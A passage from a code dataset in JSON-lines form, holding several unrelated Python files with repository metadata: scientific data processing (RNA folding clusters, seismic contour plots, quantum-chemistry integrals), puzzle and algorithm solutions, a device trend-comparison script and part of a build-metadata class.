fragment_overlap):\n # Reading first RNA fold output csv file and selecting\n # rows of interest and append them onto a list\n df = pd.read_csv(csv_file)\n df_primary_rows = pd.DataFrame()\n df_primary_rows = df[(df['Primary ID'] == df['Secondary ID']) &\\\n (df['MFE'] <= energy) &\\\n (df['Pvalue'] <= pvalue)]\n primary_list = df_primary_rows['Primary ID'].tolist()\n # Making a list of tuples for the locations\n loc_list = []\n for x in primary_list:\n start_location = (x.split('_'))[1]\n end_location = (x.split('_'))[0]\n loc_list.append((start_location, end_location))\n # Sorting locations\n sorted_by_lower_bound = sorted(loc_list, key=lambda tup: tup[0])\n merged = []\n # Making clusters\n for higher in sorted_by_lower_bound:\n if not merged:\n merged.append(higher)\n else:\n lower = merged[-1]\n if int(lower[1])-int(higher[0]) >= int(fragment_overlap):\n upper_bound = max(lower[1], higher[1])\n merged[-1] = (lower[0], upper_bound)\n else:\n if (int(higher[1])-int(higher[0])) >= int(int(fragment_length)-1):\n merged.append(higher)\n final_cluster_list = []\n for x in merged:\n if int(x[1])-int(x[0]) > int(int(fragment_length)-1):\n final_cluster_list.append(x)\n else:\n final_cluster_list.append(x)\n 
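# Sort clusters in descending coordinate order; the gene is reverse-transcribed (see getStartLocation), so the highest coordinate presumably marks the transcript start.\n 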
final_cluster_list.sort(reverse=True)\n return final_cluster_list \n\ndef doClusterShuffleAndFold(input_file, cluster_list, gene_start_location, \\\n gene_sequence, cluster_fasta_file_name, temp_file, \\\n temp_copy_file, cmd_shuffle, cmd_fold_cluster):\n cluster_dictionary = {}\n for cluster in cluster_list:\n cluster_start = cluster[1]\n cluster_end = cluster[0]\n cluster_location = cluster_end + '_' + cluster_start\n len_cluster = int(cluster_start) - int(cluster_end)\n index_start_sequence = int(gene_start_location) - int(cluster_start)\n index_end_sequence = int(index_start_sequence) + int(len_cluster)\n cluster_sequence = (str(gene_sequence))[slice(index_start_sequence, \\\n index_end_sequence)]\n cluster_dictionary[cluster_location] = cluster_sequence\n f = input_file.split('.')\n file_name = f[0] + '_cluster_output.' + f[1]\n ofile = open(file_name, 'w')\n for key, value in cluster_dictionary.items():\n ofile.write('>' + key + '\\n' + value + '\\n')\n tempofile = open(temp_file, 'w')\n tempofile.write('>' + key + '\\n' + value + '\\n')\n tempofile.close()\n shuffled = out(cmd_shuffle)\n ofile.write(shuffled)\n ofile.close()\n # Run RNAfold\n shutil.copyfile(file_name, temp_copy_file)\n in_RNAfold = open(temp_copy_file, 'r')\n out(cmd_fold_cluster)\n # remove/move files\n cmd = ('find . -name \"*.ps\" -delete')\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell = True)\n os.remove(temp_file)\n os.remove(temp_copy_file)\n return\n\ndef doFeatureFile(cluster_csv_file, energy, pvalue, \\\n dict_transcripts, final_csv_file, \\\n final_file):\n # Reading cluster csv file and selecting rows of\n # interest and append them into a list and a list\n # of tuples needed for dicitonary\n df = pd.read_csv(cluster_csv_file)\n df_primary_rows = pd.DataFrame()\n for index, columns in df.iterrows():\n df_primary_rows = df[(df['Primary ID'] == df['Secondary ID']) &\\\n (df['MFE'] <= energy) &\\\n (df['Pvalue'] <= pvalue)]\n cluster_location_list = []\n for index, row in df_primary_rows.iterrows():\n cluster_location_list.append(row['Primary ID'])\n cluster_location_dictionary = {}\n for x in cluster_location_list:\n start_location = (x.split('_'))[1]\n end_location = (x.split('_'))[0]\n cluster_location_dictionary[x] = ((end_location, start_location))\n feature_dict = {}\n count = 0\n while count < 2:\n for loc in cluster_location_dictionary:\n temp_dict = {}\n temp_list = []\n # Iterating through the transcripts dictionary\n for transcript_id, transcript_feature in dict_transcripts.items():\n # Iterating through the each transcript dictionary\n for feature in transcript_feature:\n if int(cluster_location_dictionary[loc][0]) <= int(transcript_feature[feature][0]) and \\\n int(cluster_location_dictionary[loc][0]) >= int(transcript_feature[feature][1]):\n temp_dict.setdefault(transcript_id, [])\n if feature not in temp_dict[transcript_id]:\n temp_dict[transcript_id].append(feature)\n count += 1\n # Iterating through the transcripts dictionary\n for transcript_id, transcript_feature in dict_transcripts.items():\n # Iterating through the each transcript dictionary\n for feature in transcript_feature:\n if int(cluster_location_dictionary[loc][1]) <= int(transcript_feature[feature][0]) and \\\n int(cluster_location_dictionary[loc][1]) >= int(transcript_feature[feature][1]):\n temp_dict.setdefault(transcript_id, [])\n if feature not in temp_dict[transcript_id]:\n temp_dict[transcript_id].append(feature)\n for key, value in temp_dict.items():\n temp_list.append((key, value))\n feature_dict[loc] 
= temp_list\n count += 1\n # Create final csv file\n df_final = pd.DataFrame()\n df_final['Primary ID'] = df_primary_rows['Primary ID']\n df_final['Sequence'] = df_primary_rows['Sequence']\n df_final['Fold'] = df_primary_rows['Fold']\n df_final['MFE'] = df_primary_rows['MFE']\n df_final['Pvalue'] = df_primary_rows['Pvalue']\n with open (final_csv_file, 'w') as f:\n df_final.to_csv(f, sep='\\t', index = False)\n f.close()\n ofile = open(final_file, 'w')\n for key, value in feature_dict.items():\n ofile.write('>' + key + '\\n' + str(value) + '\\n') \n return \n","repo_name":"mmarto27/MSc-Thesis","sub_path":"modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":11966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71162002332","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 8 16:13:19 2020\n\n@author: D. Li (lMU)\n\"\"\"\nfrom pandas import read_csv as rd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom scipy.interpolate import griddata\n\n#%% load data from WaveQLab output\nfolder ='/import/freenas-m-05-seissol/dli/ExaHyPE/TPV5/contour/'\nwaveq_file = folder+'waveq_conf.dat'\nwaveq = np.loadtxt(waveq_file,comments='#',skiprows=16)\n\nx1 = waveq[:,0]/1e3\ny1 = waveq[:,1]/1e3\nar_waveq = waveq[:,2]\n\nnfilter = np.where(ar_waveq<12.1) # filter out 1e9\n\nx1 = x1[nfilter] + 20\ny1 = y1[nfilter]\nar_waveq=ar_waveq[nfilter]\n\npoints1 = np.zeros((len(x1),2))\npoints1[:,0] = np.array(x1[:])\npoints1[:,1] = np.array(y1[:])\n\nxgrid1,ygrid1 = np.mgrid[0:50:100j,0:25:50j]\ngrid_waveq = griddata(points1, ar_waveq, (xgrid1, ygrid1), method='linear')\n\n# %% setup folder and prefix for input and output folder\nmodel = 'fault_out'\nfigout = folder + model+'_contour'+'.png'\n\n# load arrival time data from .csv \nfname = folder + model + '.csv'\nfigout = model + '.png'\ndata1 = rd(fname,sep=',')\nar_all = data1['Q:7'] # arrival time\n\n# set grid data of arrival time\nxgrid,ygrid = np.mgrid[0:40:80j,0:30:60j]\n\nz_all = data1[\"coordinates:2\"]\ny_all = data1[\"coordinates:1\"]\n\npoints = np.zeros((len(z_all),2))\npoints[:,0] = np.array(z_all[:])\npoints[:,1] = np.array(y_all[:])\n\ngrid_z2 = griddata(points, ar_all, (xgrid, ygrid), method='linear')\n\n#%% set 0.5 sec contours of arrival times\ncf = np.linspace(0.5,12.0,num=23)\n\n# plot\nfig,ax = plt.subplots()\n\n# ExaSeis data\ncntr1 = ax.contour(np.transpose(grid_z2),cf,cmap='plasma')\n# WaveQLab data\ncntr2 = ax.contour(np.transpose(grid_waveq),cf,cmap='plasma',linestyles='dashed')\n\nplt.xlabel('fault parallel (km)')\nplt.ylabel('downdip distance (km)')\n\nh1,_ = cntr1.legend_elements()\nh2,_ = cntr2.legend_elements()\nax.legend([h1[0], h2[0]], ['ExaSeis', 'WaveQLab'])\n\n\nplt.ylim(0,30)\nplt.xlim(10,70)\n#plt.show()\nplt.savefig(figout,dpi=100)\n\n","repo_name":"daisy20170101/ExaSeis_postprocessing","sub_path":"scripts/PltContour.py","file_name":"PltContour.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19946851034","text":"print('mons')\nimport random\nimport StoryFactsData as sf\nclass Monster:\n def __init__(self,name,element,description,BaseLevel,finnishing=''):\n #classt is the class it is weak against.\n self.name=name\n self.classt=random.choice(sf.classes)\n self.element=element\n self.desc=description\n self.finish=finnishing\n self.BaseLevel=BaseLevel\n # \\/ 
arbitrary values\n self.attack=(7 + (BaseLevel))//2\n self.health=5*BaseLevel\n if self.name in sf.Bosses:\n self.health+=50\n if self.name=='Bettasimha':\n self.classt='Champion'\n self.health+=1000\n self.attack+=100\n def regenerate(self):\n if self.name in sf.Bosses:\n self.health+=50\n self.attack=7 + (self.BaseLevel)\n self.health=5*self.BaseLevel\n if self.name=='Bettasimha':\n self.classt='Champion'\n self.health+=1500\n self.attack+=150\n","repo_name":"Bettalion/MyGame","sub_path":"monsters.py","file_name":"monsters.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4184276864","text":"#! /usr/bin/env python\n\nimport pandas as pd\nfrom datetime import datetime, timedelta\n\n\ndef get_timestamp(x):\n timestamp = datetime.strptime(x['Timestamp of event'], '%Y-%m-%d %H:%M')\n return timestamp - timedelta(hours=1)\n\n\ndef get_minute(x):\n return datetime.strftime(x['Timestamp of event'], '%M')\n\n\ndef get_date(x):\n return datetime.strftime(x['Timestamp of event'], '%Y-%m-%d')\n\n\n# read input\nwith open('04-input.txt', 'r') as f:\n content = f.read().split('\\n')\n\n# [1518-09-22 23:50] Guard #2309 begins shift\n\n# create a table\ndf = pd.DataFrame([[event[1:17], event[19:]] for event in content],\n columns=['Timestamp of event', 'Event'])\n\n# sorting by time\ndf['Timestamp of event'] = df.apply(get_timestamp, axis=1)\ndf.sort_values(by='Timestamp of event', ascending=True, inplace=True)\n\n# find the guard ID\ndf['guard_id'] = df['Event'].str.extract(r'Guard #(\\d+)')\n# propagate it forward\ndf['guard_id'].fillna(method='ffill', inplace=True)\n\n# find event booleans\ndf['fell_asleep'] = df['Event'].str.contains(r'falls asleep')\ndf['woke_up'] = df['Event'].str.contains(r'wakes up')\ndf['status'] = df['fell_asleep'] * 1 + df['woke_up'] * 0\n\ndf['Minute of event'] = df.apply(get_minute, axis=1)\ndf['Date of event'] = df.apply(get_date, axis=1)\n\npivoted_df = df.pivot_table(values='status',\n index=['Date of event', 'guard_id'],\n columns=['Minute of event'])\n\npivoted_df.fillna(method='ffill', axis=1, inplace=True)\npivoted_df.reset_index(drop=False, inplace=True)\npivoted_df['total_asleep_min'] = pivoted_df.sum(axis=1)\n\ngrouped_df = pivoted_df.groupby(['guard_id']).agg({'total_asleep_min': 'sum'})\ngrouped_df.sort_values(by='total_asleep_min', ascending=False, inplace=True)\nsleepy_guard = grouped_df.iloc[:1, :].index.values[0]\n\nprint('\\nguard who slept the most:\\n')\nprint(sleepy_guard)\n\nsliced_df = pivoted_df[pivoted_df['guard_id'] == sleepy_guard]\nsliced_df.drop(['Date of event', 'guard_id', 'total_asleep_min'], axis=1)\nprint('\\nminute during which guard most slept:\\n')\nprint(int(sliced_df.sum().idxmax()))\n\nprint('\\nsolution: %s' % (int(sleepy_guard) * int(sliced_df.sum().idxmax())))\n","repo_name":"guidopetri/advent-of-code","sub_path":"2018/04-1.py","file_name":"04-1.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33134756164","text":"'''\n Given a linked list, remove the n-th node from the end of the list and return the head of the list.\n Follow-up: can you try to do it in a single pass?\n Example 1:\n Input: head = [1,2,3,4,5], n = 2\n Output: [1,2,3,5]\n\n Example 2:\n Input: head = [1], n = 1\n Output: []\n\n Example 3:\n Input: head = [1,2], n = 1\n Output: [1]\n'''\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution1:\n def removeNthFromEnd(self, head: ListNode, n: int) -> 
ListNode:\n '''\n Approach 1:\n (1) First traverse the list once to get its total length, count.\n (2) Then move cur and pre to position count - n; cur then points at the n-th node from the end, the one we want to delete.\n (3) Set up a dummy node to avoid an error when the first node is deleted.\n '''\n dummy = ListNode(0)\n dummy.next = head\n pre = dummy\n cur = head\n\n count = 0\n while cur:\n cur = cur.next\n count += 1\n cur = head\n for i in range(count - n):\n pre = cur\n cur = cur.next\n pre.next = cur.next # Without the dummy, deleting the first node would leave pre as None, which has no next attribute and would raise an error\n return dummy.next\n\nclass Solution2:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n '''\n Approach 2:\n (1) Use the gap between two pointers: once cur reaches None, i.e. runs off the end,\n pre sits just before the node n from the end, so the deletion is done with pre.next = pre.next.next\n (2) Mind the special case where the first node is deleted; this is why we set up a dummy node\n '''\n dummy = ListNode(0)\n dummy.next = head\n cur = head\n pre = dummy\n\n for i in range(n):\n cur = cur.next\n while cur:\n pre = pre.next\n cur = cur.next\n pre.next = pre.next.next\n return dummy.next","repo_name":"wwwwkd/Data-Structure-and-Algorithm","sub_path":"Link/leetcode19.删除链表的倒数第N个节点.py","file_name":"leetcode19.删除链表的倒数第N个节点.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72790779930","text":"def quicksort(arr):\n if len(arr) <= 1:\n return arr\n\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n\n return quicksort(left) + middle + quicksort(right)\n","repo_name":"jiaweim/python-study-trails","sub_path":"m_python/basics/t_quicksort.py","file_name":"t_quicksort.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15345288696","text":"import abc\nimport numpy as np\n\nfrom time_propagator0.setup_daltonproject import (\n compute_plane_wave_integrals_from_molcas,\n)\n\n\nclass IntegralContainer(metaclass=abc.ABCMeta):\n def __init__(self, integrals, C=None, C_tilde=None):\n self._integrals = integrals\n self._C = C\n self._C_tilde = C_tilde\n self._l = (integrals[\"cosp,0\"]).shape[-1]\n\n @property\n def l(self):\n return self._l\n\n @property\n def C(self):\n return self._C\n\n @C.setter\n def C(self, C):\n self._C = C\n\n @property\n def C_tilde(self):\n return self._C_tilde\n\n @C_tilde.setter\n def C_tilde(self, C_tilde):\n self._C_tilde = C_tilde\n\n def change_basis(self,C=None,C_tilde=None):\n if C is None:\n for el in self._integrals:\n self._integrals[el] = self.C_tilde @ self._integrals[el] @ self.C\n self.C = np.eye(len(self.C))\n self.C_tilde = np.eye(len(self.C_tilde))\n else:\n for el in self._integrals:\n self._integrals[el] = C_tilde @ self._integrals[el] @ C\n\n @abc.abstractmethod\n def __getitem__(self, index):\n pass\n\n\nclass IntegralContainerFixedOrbitals(IntegralContainer):\n def __getitem__(self, index):\n return self._integrals[index]\n\n\nclass IntegralContainerOrbitalAdaptive(IntegralContainer):\n def __getitem__(self, index):\n return self.C_tilde @ self._integrals[index] @ self.C\n\n\ndef get_integrals_from_molcas(\n molecule,\n basis,\n omega,\n k_direction,\n return_s=False,\n custom_basis=False,\n):\n ma = compute_plane_wave_integrals_from_molcas(\n molecule, basis, omega, k_direction, custom_basis=custom_basis\n )\n\n cos2 = ma.cos2\n sin2 = ma.sin2\n\n l = len(cos2)\n cosp = np.zeros((3, l, l), dtype=complex)\n sinp = np.zeros((3, l, l), dtype=complex)\n cosp[0] = ma.cosp(0)\n cosp[1] = ma.cosp(1)\n cosp[2] = ma.cosp(2)\n sinp[0] = ma.sinp(0)\n sinp[1] = ma.sinp(1)\n sinp[2] = ma.sinp(2)\n\n return (cosp, sinp, cos2, sin2) if 
not return_s else (cosp, sinp, cos2, sin2, ma.s)\n\n\ndef setup_plane_wave_integrals_from_molcas(\n pulse_inputs,\n molecule,\n basis,\n quadratic_terms=False,\n cross_terms=False,\n compute_A=False,\n custom_basis=False,\n):\n n_pulses = len(pulse_inputs)\n\n integrals = {}\n\n for m in range(n_pulses):\n k_direction = pulse_inputs[m][\"k_direction\"]\n omega = pulse_inputs[m][\"omega\"]\n\n cosp, sinp, cos2, sin2, s = get_integrals_from_molcas(\n molecule,\n basis,\n omega,\n k_direction,\n return_s=True,\n custom_basis=custom_basis,\n )\n\n integrals[f\"cosp,{m}\"] = cosp\n integrals[f\"sinp,{m}\"] = sinp\n\n if quadratic_terms:\n integrals[f\"cos+,{m}{m}\"] = cos2\n integrals[f\"sin+,{m}{m}\"] = sin2\n integrals[f\"cos-,{m}{m}\"] = s\n integrals[f\"sin-,{m}{m}\"] = np.zeros_like(s)\n\n if compute_A:\n cosp, sinp, cos2, sin2 = get_integrals_from_molcas(\n molecule, basis, omega / 2, k_direction, custom_basis=custom_basis\n )\n integrals[f\"cos,{m}\"] = cos2\n integrals[f\"sin,{m}\"] = sin2\n\n if cross_terms:\n pulse_nums = np.arange(n_pulses)\n for m in pulse_nums:\n for n in pulse_nums[pulse_nums > m]:\n\n k_direction_m = pulse_inputs[m][\"k_direction\"]\n omega_m = pulse_inputs[m][\"omega\"]\n\n k_direction_n = pulse_inputs[n][\"k_direction\"]\n omega_n = pulse_inputs[n][\"omega\"]\n\n ck_m = omega_m * np.array(k_direction_m)\n ck_n = omega_n * np.array(k_direction_n)\n ck_pl = ck_m + ck_n\n ck_mi = ck_m - ck_n\n omega_pl = (1 / 2) * np.linalg.norm(ck_pl)\n omega_mi = (1 / 2) * np.linalg.norm(ck_mi)\n k_direction_pl = ck_pl / np.linalg.norm(ck_pl)\n k_direction_mi = ck_mi / np.linalg.norm(ck_mi)\n cosp, sinp, cos2, sin2 = get_integrals_from_molcas(\n molecule, basis, omega_pl, k_direction_pl, custom_basis=custom_basis\n )\n integrals[f\"cos+,{m}{n}\"] = cos2\n integrals[f\"cos+,{n}{m}\"] = cos2\n integrals[f\"sin+,{m}{n}\"] = sin2\n integrals[f\"sin+,{n}{m}\"] = sin2\n\n cosp, sinp, cos2, sin2 = get_integrals_from_molcas(\n molecule, basis, omega_mi, k_direction_mi, custom_basis=custom_basis\n )\n integrals[f\"cos-,{m}{n}\"] = cos2\n integrals[f\"cos-,{n}{m}\"] = cos2\n integrals[f\"sin-,{m}{n}\"] = sin2\n integrals[f\"sin-,{n}{m}\"] = -sin2\n\n return integrals\n","repo_name":"HyQD/time-propagator","sub_path":"time_propagator0/field_interaction/plane_wave_integrals_containers.py","file_name":"plane_wave_integrals_containers.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41237601160","text":"import pandas as pd\nimport json\nimport os\nimport glob\nimport csv\nimport urllib.request as url\nimport difflib\nimport sys\nimport time\nimport itertools\nimport threading\nimport socket\nimport subprocess\nimport shutil\nfrom urllib.error import HTTPError, URLError\n\nprocessDone = False\ndef loadJsonData (URLvars):\n global processDone\n try:\n jsondata = json.loads(url.urlopen(URLvars,timeout=20).read().decode())\n time.sleep(1)\n return jsondata\n except HTTPError as error:\n print(\"HTTP Timeout!\")\n processDone = True\n exit()\n\n#here is the animation\ndef animate():\n for c in itertools.cycle(['|', '/', '-', '\\\\']):\n if processDone:\n sys.stdout.write('\\r ')\n break\n sys.stdout.write('\\r ' + c)\n sys.stdout.flush()\n time.sleep(0.1)\n sys.stdout.write('\\r ')\n\ndef prepend_line(file_name, line):\n \"\"\" Insert given string as a new line at the beginning of a file \"\"\"\n # define name of temporary dummy file\n dummy_file = file_name + '.bak'\n # open original file in read mode and dummy 
file in write mode\n with open(file_name, 'r') as read_obj, open(dummy_file, 'w') as write_obj:\n # Write given line to the dummy file\n write_obj.write(line + '\\n')\n # Read lines from original file one by one and append them to the dummy file\n for line in read_obj:\n write_obj.write(line)\n # remove original file\n os.remove(file_name)\n # Rename dummy file as the original file\n os.rename(dummy_file, file_name)\n\n\nIP= sys.argv[1]\n#IP= \"192.168.5.123\";\nURLvars=\"http://\"+IP+\"/get_trends.cgi\"\njsonTrendPath = \"jsontrend\"\nif os.path.exists(jsonTrendPath):\n shutil.rmtree(jsonTrendPath, ignore_errors=True)\n\nos.mkdir(jsonTrendPath)\n\nprint(\"Loading trends from \"+ IP + \"\\n\")\nt = threading.Thread(target=animate)\nt.start()\njsondata = loadJsonData(URLvars)\nprocessDone=True\ntrendsNameArray = jsondata['query']['trends']\n\nprint(\"\\nWriting cgi_json_data.csv\\n\")\ndf = pd.DataFrame(jsondata['trends'])\ndf = df['filename']\nfor index in df.index:\n df_track = pd.DataFrame(jsondata['trends'][index]['track'])\n df_track['id'] = df_track['id'].str.pad(32, side='right', fillchar=' ')\n df_track.to_csv(jsonTrendPath+\"/\"+df[index],sep=';',header=False,index=False)\n prepend_line(jsonTrendPath+\"/\"+df[index],'L')\n\nprint(\"Downloading original files \\n\")\ntrendPath = \"customtrend\"\nif os.path.exists(trendPath):\n shutil.rmtree(trendPath, ignore_errors=True)\n\ntry:\n subprocess.call([\"rsync\", \"-Havx\", \"root@\"+IP+\":/local/data/\"+trendPath, \"./\"])\n# fRes = subprocess.call([\"rsync\", \"-Havx\", \"root@192.168.0.111:/local/data/\"+trendPath, \"./\"])\nexcept subprocess.CalledProcessError as rsyncRes:\n print(\"error code\", rsyncRes.returncode, rsyncRes.output)\n\ndifferenceFile = \"data_difference_trends.diff\"\nprint(\"Looking for differences \\n\")\nfor index in df.index:\n with open(trendPath + '/' + df[index], 'r') as t1, open(jsonTrendPath+\"/\"+df[index], 'r') as t2:\n fileone = t1.readlines()\n filetwo = t2.readlines()\n fileone = [line.replace(' ', '') for line in fileone]\n filetwo = [line.replace(' ', '') for line in filetwo]\n\n with open(differenceFile, 'a') as outFile:\n for line in difflib.unified_diff(fileone, filetwo, fromfile=trendPath + '/' + df[index], tofile=jsonTrendPath+\"/\"+df[index]):\n outFile.write(line)\n\nif not os.stat(differenceFile).st_size == 0:\n print(\"Done! Differences are loaded in \"+ differenceFile)\nelse:\n print(\"Done! 
No differences were found!\")\n #clean\n shutil.rmtree(trendPath, ignore_errors=True)\n shutil.rmtree(jsonTrendPath, ignore_errors=True)\n os.remove(differenceFile)\n","repo_name":"MECTsrl/imx_mect","sub_path":"projects/testing/cgi_trends_compare.py","file_name":"cgi_trends_compare.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"21862585640","text":"class Udacian:\n def __init__(self, name, city,enrollment,nanodegree,status):\n self.name = name\n self.city = city\n self.enrollment = enrollment\n self.nanodegree = nanodegree\n self.status = status\n\n def print_udacian(self):\n print(self.name+\" \"+self.city+\" \"+self.nanodegree)\n\nu = Udacian(\"elaaf\",\"jeddah\",\"enrollment\",\"full stack\",\"s\")\nu.print_udacian()\n","repo_name":"Lo0ofah/udacian","sub_path":"c2.py","file_name":"c2.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27837826233","text":"from typing import Dict, Optional, List, Tuple\nimport urllib.parse\nimport urllib.request\nimport yaml\nfrom collections import OrderedDict\nfrom dockerfile_parse import DockerfileParser\nimport pathlib\nimport json\nimport traceback\n\nfrom .pushd import Dir\nfrom .distgit import ImageDistGitRepo, RPMDistGitRepo, DistGitRepo\nfrom . import exectools\nfrom . import logutil\nfrom . import brew\n\nfrom .model import Model, Missing\n\n#\n# These are used as labels to index selection of a subclass.\n#\nDISTGIT_TYPES = {\n 'image': ImageDistGitRepo,\n 'rpm': RPMDistGitRepo\n}\n\nCONFIG_MODES = [\n 'enabled', # business as usual\n 'disabled', # manually disabled from automatically building\n 'wip', # Work in Progress, do not build\n]\n\nCONFIG_MODE_DEFAULT = CONFIG_MODES[0]\n\n\nclass Metadata(object):\n\n def __init__(self, meta_type, runtime, data_obj: Dict, commitish: Optional[str] = None):\n \"\"\"\n :param: meta_type - a string. Index to the sub-class <'rpm'|'image'>.\n :param: runtime - a Runtime object.\n :param: name - a filename to load as metadata\n :param: commitish: If not None, build from the specified upstream commit-ish instead of the branch tip.\n \"\"\"\n self.meta_type = meta_type\n self.runtime = runtime\n self.data_obj = data_obj\n self.config_filename = data_obj.filename\n self.full_config_path = data_obj.path\n self.commitish = commitish\n\n # URL and branch of public upstream source are set later by Runtime.resolve_source()\n self.public_upstream_url = None\n self.public_upstream_branch = None\n\n # Some config filenames have suffixes to avoid name collisions; strip off the suffix to find the real\n # distgit repo name (which must be combined with the distgit namespace).\n # e.g. openshift-enterprise-mediawiki.apb.yml\n # distgit_key=openshift-enterprise-mediawiki.apb\n # name (repo name)=openshift-enterprise-mediawiki\n\n self.distgit_key = data_obj.key\n self.name = self.distgit_key.split('.')[0] # Split off any '.apb' style differentiator (if present)\n\n self.runtime.logger.debug(\"Loading metadata from {}\".format(self.full_config_path))\n\n self.config = Model(data_obj.data)\n\n self.mode = self.config.get('mode', CONFIG_MODE_DEFAULT).lower()\n if self.mode not in CONFIG_MODES:\n raise ValueError('Invalid mode for {}'.format(self.config_filename))\n\n self.enabled = (self.mode == CONFIG_MODE_DEFAULT)\n\n # Basic config validation. 
All images currently required to have a name in the metadata.\n # This is required because from.member uses these data to populate FROM in images.\n # It would be possible to query this data from the distgit Dockerflie label, but\n # not implementing this until we actually need it.\n assert (self.config.name is not Missing)\n\n # Choose default namespace for config data\n if meta_type == \"image\":\n self.namespace = \"containers\"\n else:\n self.namespace = \"rpms\"\n\n # Allow config data to override\n if self.config.distgit.namespace is not Missing:\n self.namespace = self.config.distgit.namespace\n\n self.qualified_name = \"%s/%s\" % (self.namespace, self.name)\n self.qualified_key = \"%s/%s\" % (self.namespace, self.distgit_key)\n\n # Includes information to identify the metadata being used with each log message\n self.logger = logutil.EntityLoggingAdapter(logger=self.runtime.logger, extra={'entity': self.qualified_key})\n\n self._distgit_repo = None\n\n def save(self):\n self.data_obj.data = self.config.primitive()\n self.data_obj.save()\n\n def distgit_remote_url(self):\n pkgs_host = self.runtime.group_config.urls.get('pkgs_host', 'pkgs.devel.redhat.com')\n # rhpkg uses a remote named like this to pull content from distgit\n if self.runtime.user:\n return f'ssh://{self.runtime.user}@{pkgs_host}/{self.qualified_name}'\n return f'ssh://{pkgs_host}/{self.qualified_name}'\n\n def distgit_repo(self, autoclone=True) -> DistGitRepo:\n if self._distgit_repo is None:\n self._distgit_repo = DISTGIT_TYPES[self.meta_type](self, autoclone=autoclone)\n return self._distgit_repo\n\n def branch(self):\n if self.config.distgit.branch is not Missing:\n return self.config.distgit.branch\n return self.runtime.branch\n\n def build_root_tag(self):\n return '{}-build'.format(self.branch())\n\n def candidate_brew_tag(self):\n return '{}-candidate'.format(self.branch())\n\n def candidate_brew_tags(self):\n return [self.candidate_brew_tag()]\n\n def get_arches(self):\n \"\"\"\n :return: Returns the list of architecture this image/rpm should build for. This is an intersection\n of config specific arches & globally enabled arches in group.yml\n \"\"\"\n if self.config.arches:\n ca = self.config.arches\n intersection = list(set(self.runtime.get_global_arches()) & set(ca))\n if len(intersection) != len(ca):\n self.logger.info(f'Arches are being pruned by group.yml. 
Using computed {intersection} vs config list {ca}')\n if not intersection:\n raise ValueError(f'No arches remained enabled in {self.qualified_key}')\n return intersection\n else:\n return list(self.runtime.get_global_arches())\n\n def cgit_url(self, filename):\n rev = self.branch()\n ret = \"/\".join((self.runtime.group_config.urls.cgit, self.qualified_name, \"plain\", filename))\n if rev is not None:\n ret = \"{}?h={}\".format(ret, rev)\n return ret\n\n def fetch_cgit_file(self, filename):\n url = self.cgit_url(filename)\n req = exectools.retry(\n 3, lambda: urllib.request.urlopen(url),\n check_f=lambda req: req.code == 200)\n return req.read()\n\n def get_latest_build(self, default=-1):\n \"\"\"\n :param default: A value to return if no latest is found (if not specified, an exception will be thrown)\n :return: Returns the most recent build object from koji.\n Example https://gist.github.com/jupierce/e6bfd98a3777ae5d56e0f7e92e5db0c9\n \"\"\"\n component_name = self.get_component_name()\n with self.runtime.pooled_koji_client_session() as koji_api:\n builds = koji_api.getLatestBuilds(self.candidate_brew_tag(), package=component_name)\n if not builds:\n if default != -1:\n self.logger.warning(\"No builds detected for using tag: %s\" % (self.candidate_brew_tag()))\n return default\n raise IOError(\"No builds detected for %s using tag: %s\" % (self.qualified_name, self.candidate_brew_tag()))\n return builds[0]\n\n def get_latest_build_info(self, default=-1):\n \"\"\"\n Queries brew to determine the most recently built release of the component\n associated with this image. This method does not rely on the \"release\"\n label needing to be present in the Dockerfile.\n :param default: A value to return if no latest is found (if not specified, an exception will be thrown)\n :return: A tuple: (component name, version, release); e.g. (\"registry-console-docker\", \"v3.6.173.0.75\", \"1\")\n \"\"\"\n build = self.get_latest_build(default=default)\n if default != -1 and build == default:\n return default\n return build['name'], build['version'], build['release']\n\n def get_component_name(self, default=-1) -> str:\n \"\"\"\n :param default: If the component name cannot be determined,\n :return: Returns the component name of the image. This is the name in the nvr\n that brew assigns to this image's build.\n \"\"\"\n raise IOError('Subclass must implement')\n\n def needs_rebuild(self) -> Tuple[bool, str]:\n \"\"\"\n Check whether the commit that we recorded in the distgit content (according to cgit)\n matches the commit of the source (according to git ls-remote) and has been built\n (according to brew).\n Returns: (, message). If True, message describing the details is returned. If False,\n None is returned.\n \"\"\"\n component_name = self.get_component_name(default='')\n if not component_name:\n # This can happen for RPMs if they have never been rebased into\n # distgit.\n return True, 'Could not find component name; assuming never built'\n\n # latest_build_creation_event_id = latest_build['creation_event_id']\n # all candidate Brew tags configured for this component. e.g. [rhaos-4.7-rhel-8-candidate, rhaos-4.7-rhel-7-candidate]\n candidate_tags = self.candidate_brew_tags()\n with 